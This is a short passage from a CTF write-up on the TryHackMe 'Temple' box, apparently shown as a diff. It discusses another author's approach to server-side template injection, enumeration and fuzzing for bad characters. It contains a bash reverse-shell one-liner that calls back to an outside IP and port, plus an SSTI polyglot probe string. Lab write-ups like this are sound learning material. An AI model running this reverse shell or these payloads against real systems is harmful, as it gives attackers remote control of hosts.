7RU7H/CTFs/TryHackMe/Markdown/Temple/Temple-Helped-Through.md

 bash -c "bash -i >& /dev/tcp/10.9.1.132/4242 0>&1"`
 ```

 [Scarecrow/n1gh75hd3/mx9tff4hha7clo8mah](https://scarecrow.gitbook.io/ctfs-challenges-random-boxes/v/temple/#testing-for-ssti), write up was really great; sadly I  uses a Polygot `${{<%[%'"}}%\.` to test for SSTI.
-And unlike the box creator contain methodoly for enumeration.
+And unlike the box creator contain methodology for enumeration.
 Similiarly there is a reate graph of deduction of SSTI to enumerate the framework.
 He fuzzed for bad characters as he went, which I generally have learnt from others and from other exploits that should be done before trying to exploit an application.

 Interestingly Scrarecrow tried to create accounts that would in sequence:
 - create an evil config file